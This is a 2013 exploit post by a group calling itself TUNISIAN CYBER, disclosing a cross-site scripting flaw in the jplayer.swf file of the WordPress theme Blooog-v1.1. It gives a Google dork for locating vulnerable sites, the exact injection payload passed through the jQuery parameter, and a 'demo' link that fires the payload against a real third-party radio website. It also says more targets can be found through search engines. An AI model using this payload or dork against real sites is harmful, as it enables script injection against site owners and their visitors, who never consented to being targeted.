facebook facebook twitter rss

WordPress Blooog-v1.1 Theme Cross Site Scripting

Author: TUNISIAN CYBER , Published: 02-12-2013
X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X


[+] Author: TUNISIAN CYBER
[+] Exploit Title: WordPress Blooog-v1.1 Theme Cross Site Scripting
[+] Date: 2-12-2013
[+] Category: WebApp
[+] Google Dork: inurl:"wp-content/themes/Blooog-v1.1"
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################
P.O.C:
http: //127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf

P4yl04D:
?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)//

The link will be like this:

http: //127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)//


Demo:(the rest at google,bing..)

http://www.951collegeradio.com/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//

img:http://oi40.tinypic.com/33k6sqq.jpg
########################################################################################

Like us on Facebook :